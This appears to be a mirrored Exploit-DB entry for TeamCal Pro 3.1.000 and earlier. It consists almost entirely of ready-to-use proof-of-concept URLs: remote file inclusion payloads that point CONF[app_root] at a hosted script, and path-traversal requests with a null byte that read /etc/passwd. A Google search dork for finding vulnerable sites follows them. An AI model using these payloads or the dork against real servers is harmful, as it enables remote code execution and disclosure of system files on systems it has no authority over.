- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4785
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6554 cve-2007-6553
- Дата публикации
- 2007-12-25
Код:
############## ###### ###### ######## ######## ###### ######
## ## ## ## ## ## ## ## ## #### ####
## #### ###### ## ## ######## ## ## ######## #### ####
## #### ## ## ## ## ## ## ## ## ## ## ##
## ## ## ########## ## ###### ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## #### ## ## ## ## ## ##
###### ########## ###### ########## ###### #### ###### ######## ###### ######
TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities
Script: http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=27
POC :
http://localhost/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/other.inc.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://localhost/020.txt?
http://localhost/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00
http://localhost/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00
http://localhost/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00
http://localhost/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00
Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a
SP.Thanx To : Tryag.Com/cc [Tryag-Team]
# milw0rm.com [2007-12-25]- Источник
- www.exploit-db.com
